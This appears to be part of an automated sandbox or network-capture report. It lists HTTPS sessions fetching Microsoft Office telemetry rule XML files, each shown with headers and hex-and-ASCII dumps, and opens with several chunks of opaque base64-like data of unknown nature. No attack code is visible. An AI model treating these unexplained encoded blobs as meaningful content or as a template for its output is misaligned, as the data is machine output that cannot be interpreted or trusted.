                                                                                                                                                                                                                                              Data Ascii: 3f8cjfKF1ayLN+qnjM39P6Ud3OVqvhW3WO7uRSZnHCh6SuyO8IadlYYr6aqfg+50s13a6CTsXvwQouVdYC1SCGVQ7ID1k9OujCjoqJvH8SirGNrqaaYbt1ju7kUmZxw9Q13ulfzV6qOLK+C7ydy/I+oa0aQ89B37G6fsUnQ1UAZlXfeN8ZbRr44p4r+CzPk1qxDQ72C0XrlWqfEdPn99CnhI/ZW5otyuiyLx7ZaN6HqtEZ28JLUS+xeh71duP
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1369INData Raw: 65 2f 6f 6e 77 6d 64 47 70 69 53 33 72 71 70 76 4f 39 44 4b 67 46 4e 6a 6f 61 62 63 4d 39 42 66 75 70 78 31 68 4a 78 78 66 4e 33 33 4e 73 39 6a 58 77 4f 36 63 5a 65 43 68 79 5a 75 78 4f 36 49 61 30 2b 42 32 75 67 7a 35 45 61 37 76 56 57 34 34 55 41 6c 35 53 50 61 46 2b 35 6e 51 71 49 77 68 35 71 6d 4e 7a 2f 5a 36 35 46 33 61 2f 43 54 73 58 74 38 56 74 50 4d 66 53 44 52 63 41 47 64 4d 35 63 54 6b 32 63 62 67 67 69 6d 6e 39 63 6e 48 2b 6a 43 6a 48 74 54 67 61 62 51 58 2b 42 2b 6d 35 46 56 30 50 6c 59 56 63 31 2f 2f 69 2f 47 54 31 36 79 4b 4b 65 4f 2f 67 6f 4f 2f 65 71 30 46 6e 62 77 6b 6c 42 58 68 4e 62 7a 37 48 58 6c 78 52 55 64 77 56 72 37 63 75 35 37 54 6f 59 51 76 34 61 61 4d 7a 76 45 2f 6f 42 72 52 35 47 53 33 47 50 45 62 70 75 46 52 61 6a 78 52 41 6e
                                                                                                                                                                                                                                              Data Ascii: e/onwmdGpiS3rqpvO9DKgFNjoabcM9Bfupx1hJxxfN33Ns9jXwO6cZeChyZuxO6Ia0+B2ugz5Ea7vVW44UAl5SPaF+5nQqIwh5qmNz/Z65F3a/CTsXt8VtPMfSDRcAGdM5cTk2cbggimn9cnH+jCjHtTgabQX+B+m5FV0PlYVc1//i/GT16yKKeO/goO/eq0FnbwklBXhNbz7HXlxRUdwVr7cu57ToYQv4aaMzvE/oBrR5GS3GPEbpuFRajxRAn
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1369INData Raw: 39 5a 62 5a 72 49 68 6c 71 65 32 4f 32 37 46 69 36 6a 72 48 36 57 4b 6a 44 38 49 52 72 72 67 64 65 58 46 46 52 33 42 57 76 74 79 37 6d 74 4f 71 69 43 44 6a 70 59 37 41 38 44 61 75 45 4e 44 67 62 62 41 62 35 51 53 6f 35 31 31 70 4d 56 4d 4c 5a 56 54 37 68 50 66 58 6b 65 43 43 50 61 66 31 79 66 4c 6d 4f 75 6f 43 6b 2f 30 6b 73 78 4b 33 54 75 37 6d 55 48 51 7a 55 77 64 32 57 66 71 50 2f 4a 48 5a 6f 59 59 67 35 4b 69 50 77 76 45 32 6f 42 72 56 37 6d 71 35 47 50 4d 51 71 4b 6b 54 4a 6a 68 45 52 79 38 61 7a 49 6e 31 6e 74 79 6d 69 44 50 50 6e 4d 6e 63 76 79 50 71 47 74 47 6b 50 50 51 61 2f 42 36 69 37 46 56 6a 50 6c 51 4e 66 31 58 78 6c 76 71 59 31 71 65 4f 4b 4f 69 6a 6a 4d 33 6a 50 61 45 57 31 65 31 71 73 6c 36 35 56 71 6e 78 48 54 35 2f 61 67 52 35 55 65 2b
                                                                                                                                                                                                                                              Data Ascii: 9ZbZrIhlqe2O27Fi6jrH6WKjD8IRrrgdeXFFR3BWvty7mtOqiCDjpY7A8DauENDgbbAb5QSo511pMVMLZVT7hPfXkeCCPaf1yfLmOuoCk/0ksxK3Tu7mUHQzUwd2WfqP/JHZoYYg5KiPwvE2oBrV7mq5GPMQqKkTJjhERy8azIn1ntymiDPPnMncvyPqGtGkPPQa/B6i7FVjPlQNf1XxlvqY1qeOKOijjM3jPaEW1e1qsl65VqnxHT5/agR5Ue+
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1369INData Raw: 61 47 4b 5a 61 6e 74 6a 74 75 78 59 75 6f 73 79 2b 4e 6a 75 31 7a 65 45 62 58 6f 56 32 55 30 55 45 64 6f 46 4f 66 45 2f 4a 75 66 2b 4d 55 6f 36 36 43 4e 30 66 30 36 71 68 54 61 37 6e 61 37 45 66 6f 56 72 75 78 50 5a 79 31 54 44 48 4a 5a 2b 6f 76 30 6d 39 65 71 78 57 75 6e 71 70 47 44 71 58 71 47 48 73 7a 75 4a 70 4d 45 34 52 47 69 2b 46 5a 72 4d 78 77 59 4f 55 4f 2b 67 2f 66 58 68 2b 43 46 4a 4f 71 2f 6a 4d 4c 37 4d 4b 63 56 30 75 46 68 75 78 72 7a 48 61 44 37 55 32 6b 2f 57 67 78 32 58 2f 32 50 38 5a 6e 57 73 73 56 72 70 36 71 52 67 36 6c 36 67 41 62 63 36 57 6a 32 4d 50 77 41 71 61 74 38 61 44 52 62 43 32 45 61 34 63 72 69 31 39 69 73 78 58 32 6e 70 49 66 50 38 6a 32 69 46 64 6a 6b 62 37 51 52 2f 52 69 70 2b 31 64 71 4e 55 34 49 64 46 66 36 69 66 47 53
                                                                                                                                                                                                                                              Data Ascii: aGKZantjtuxYuosy+Nju1zeEbXoV2U0UEdoFOfE/Juf+MUo66CN0f06qhTa7na7EfoVruxPZy1TDHJZ+ov0m9eqxWunqpGDqXqGHszuJpME4RGi+FZrMxwYOUO+g/fXh+CFJOq/jML7MKcV0uFhuxrzHaD7U2k/Wgx2X/2P8ZnWssVrp6qRg6l6gAbc6Wj2MPwAqat8aDRbC2Ea4cri19isxX2npIfP8j2iFdjkb7QR/Rip+1dqNU4IdFf6ifGS
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1369INData Raw: 6d 6e 39 63 6e 44 39 54 61 70 47 74 50 72 61 62 73 5a 2f 42 6d 6b 35 30 39 70 4f 6c 51 4c 66 31 66 73 6a 76 47 46 31 71 6d 49 4b 2b 2b 2f 69 6f 4f 2f 65 71 30 46 6e 62 77 6b 68 68 54 30 47 72 6a 6b 55 69 59 67 45 68 34 33 58 66 4c 45 6f 39 66 4e 73 6f 55 75 35 36 71 48 30 66 41 79 70 52 66 64 34 6d 2b 2b 48 66 34 53 6f 4f 42 62 5a 7a 4a 64 42 6e 64 66 2f 6f 33 70 6d 70 2f 75 78 53 4c 2f 37 64 47 44 78 6a 61 68 4c 4e 37 79 4a 4b 74 51 37 6c 61 70 35 52 30 2b 66 31 30 56 65 6c 4c 36 68 50 61 52 31 4b 47 45 4a 75 65 74 69 73 50 30 4d 61 55 62 32 75 6c 75 76 52 66 6c 48 71 72 37 58 57 6f 37 48 45 6b 33 58 65 62 45 6f 39 66 76 6f 34 34 70 35 36 43 63 67 2b 35 30 73 31 33 61 36 43 54 73 58 76 38 64 70 65 39 57 5a 54 78 53 44 48 31 56 38 59 37 39 6b 64 65 6c 68
                                                                                                                                                                                                                                              Data Ascii: mn9cnD9TapGtPrabsZ/Bmk509pOlQLf1fsjvGF1qmIK++/ioO/eq0FnbwkhhT0GrjkUiYgEh43XfLEo9fNsoUu56qH0fAypRfd4m++Hf4SoOBbZzJdBndf/o3pmp/uxSL/7dGDxjahLN7yJKtQ7lap5R0+f10VelL6hPaR1KGEJuetisP0MaUb2uluvRflHqr7XWo7HEk3XebEo9fvo44p56Ccg+50s13a6CTsXv8dpe9WZTxSDH1V8Y79kdelh
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1369INData Raw: 4c 77 76 77 71 72 56 32 54 70 47 4c 30 52 71 64 59 37 75 31 4d 4a 6d 63 4d 56 53 77 50 72 64 4f 72 78 63 44 75 6e 47 58 78 37 64 47 52 76 33 71 34 58 59 57 6b 49 37 63 4d 35 52 43 74 2f 31 34 68 41 57 49 6e 66 46 62 39 69 50 71 51 6e 2b 37 46 4b 71 66 31 73 49 50 79 4b 4c 68 53 7a 50 4a 70 70 42 6d 37 48 72 2f 6b 55 53 5a 78 48 45 74 7a 55 66 4b 42 2f 49 65 51 73 70 55 75 36 37 76 46 78 2b 4e 36 35 46 33 4d 37 32 75 6d 45 50 42 5a 76 2f 39 51 64 6a 78 5a 41 44 74 53 37 34 6e 33 31 35 48 67 6b 43 37 72 71 34 54 57 76 69 75 38 48 73 76 6a 4b 4c 77 50 2b 68 72 75 31 68 4d 6d 4a 78 78 66 4e 32 2f 39 69 76 57 51 79 62 48 49 42 65 79 68 69 73 2f 77 50 65 70 54 6e 65 49 6b 37 45 32 35 56 71 72 34 48 54 35 76 44 6c 77 69 43 61 6e 55 71 59 69 52 75 63 55 7a 70 2f
                                                                                                                                                                                                                                              Data Ascii: LwvwqrV2TpGL0RqdY7u1MJmcMVSwPrdOrxcDunGXx7dGRv3q4XYWkI7cM5RCt/14hAWInfFb9iPqQn+7FKqf1sIPyKLhSzPJppBm7Hr/kUSZxHEtzUfKB/IeQspUu67vFx+N65F3M72umEPBZv/9QdjxZADtS74n315HgkC7rq4TWviu8HsvjKLwP+hru1hMmJxxfN2/9ivWQybHIBeyhis/wPepTneIk7E25Vqr4HT5vDlwiCanUqYiRucUzp/
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1369INData Raw: 65 72 68 64 68 61 51 6a 75 68 50 32 46 61 44 71 54 33 51 35 58 78 46 30 48 63 43 36 33 70 72 53 70 59 73 69 32 5a 4f 6f 79 65 45 33 70 52 72 6a 32 6c 4f 6c 47 65 64 55 69 4f 70 4c 5a 58 38 53 52 32 38 61 70 73 54 61 6e 63 2b 74 69 69 4b 6e 34 38 6e 48 73 57 4c 71 4f 4e 44 70 59 62 6f 5a 74 54 65 6b 2b 56 42 70 4f 42 78 4a 4e 31 61 2b 33 4c 75 57 31 62 43 49 4b 75 44 68 6a 74 6e 32 65 75 52 64 30 36 51 38 39 42 2f 39 42 71 50 6d 57 69 6f 35 55 67 6b 33 52 62 43 64 75 34 47 66 2b 4e 5a 72 70 37 2f 4a 6d 37 46 39 70 42 44 63 35 32 71 33 44 4f 55 51 72 66 39 65 49 51 46 69 49 6e 70 58 2b 34 72 38 71 65 47 42 6a 7a 58 71 6f 6f 36 42 30 54 32 38 48 75 50 61 55 36 55 5a 35 31 53 49 36 6b 74 6c 66 78 4a 48 62 78 71 6d 78 4e 71 64 7a 36 32 4b 49 71 57 4e 6a 74 58
                                                                                                                                                                                                                                              Data Ascii: erhdhaQjuhP2FaDqT3Q5XxF0HcC63prSpYsi2ZOoyeE3pRrj2lOlGedUiOpLZX8SR28apsTanc+tiiKn48nHsWLqONDpYboZtTek+VBpOBxJN1a+3LuW1bCIKuDhjtn2euRd06Q89B/9BqPmWio5Ugk3RbCdu4Gf+NZrp7/Jm7F9pBDc52q3DOUQrf9eIQFiInpX+4r8qeGBjzXqoo6B0T28HuPaU6UZ51SI6ktlfxJHbxqmxNqdz62KIqWNjtX


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              140192.168.2.46386613.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC192OUTGET /rules/rule700901v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:21 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1408
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE1038EF2"
                                                                                                                                                                                                                                              x-ms-request-id: 26ee9e08-901e-0048-4009-2cb800000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061621Z-16ccfc49897wvnbhhC1DFWtfnn00000001q0000000001bzg
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700901" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenan


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              141192.168.2.46386413.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC192OUTGET /rules/rule703450v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC538INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:21 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1372
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:55 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE6669CA7"
                                                                                                                                                                                                                                              x-ms-request-id: 44a13eaa-801e-0078-64c1-2bbac6000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061621Z-16ccfc49897rxv9khC1DFWwn2800000001ug0000000018qc
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1372INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703450" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenOfficeMobile" S="Medium" /> <


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              142192.168.2.46386313.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC192OUTGET /rules/rule703451v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:21 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1409
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDFC438CF"
                                                                                                                                                                                                                                              x-ms-request-id: ad891365-d01e-0014-3abf-2bed58000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061621Z-16dc884887bq5c9jhC1DFW2g3g00000001qg0000000099ke
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1409INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 34 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4f 66 66 69 63 65 4d 6f 62 69 6c 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703451" V="1" DC="SM" EN="Office.Telemetry.Event.Office.OfficeMobile.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTo


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              143192.168.2.46386513.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC192OUTGET /rules/rule700900v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:21 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1371
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:28:06 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BED3D048D"
                                                                                                                                                                                                                                              x-ms-request-id: 974f3b80-701e-006f-8009-2cafc4000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061621Z-16dc884887blxdnjhC1DFWpw2s00000001kg000000007u58
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:21 UTC1371INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 39 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4e 61 74 75 72 61 6c 4c 61 6e 67 75 61 67 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72 6f 6f 66 69 6e 67 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700900" V="1" DC="SM" EN="Office.Telemetry.Event.Office.NaturalLanguage" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenProofing" S="Medium" /> <F


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              144192.168.2.46386813.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC192OUTGET /rules/rule702251v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC517INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:22 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1389
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BE0F427E7"
                                                                                                                                                                                                                                              x-ms-request-id: 4dd084a3-b01e-003d-3da0-2bd32c000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061622Z-176bd8f9bc5t82pjhC1DFWycvg00000001p00000000009nx
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 32 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 4d 4c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 4d 4c 22 20 53 3d 22
                                                                                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702251" V="1" DC="SM" EN="Office.Telemetry.Event.Office.ML.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenML" S="


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              145192.168.2.46386913.107.246.45443
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC192OUTGET /rules/rule702250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                                                                                              2024-11-02 06:16:22 UTC545INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              Date: Sat, 02 Nov 2024 06:16:22 GMT
                                                                                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                                                                                              Content-Length: 1352
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:27:39 GMT
                                                                                                                                                                                                                                              ETag: "0x8DC582BDD0A87E5"
                                                                                                                                                                                                                                              x-ms-request-id: 682519bf-001e-005a-0bd2-2cc3d0000000
                                                                                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                                                                                              x-azure-ref: 20241102T061622Z-16dc884887b5dxtghC1DFW9q7c00000001s00000000060yn
                                                                                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                              X-Cache-Info: L2_T2
                                                                                                                                                                                                                                              X-Cache: TCP_REMOTE_HIT
                                                                                                                                                                                                                                              Accept-Ranges: bytes
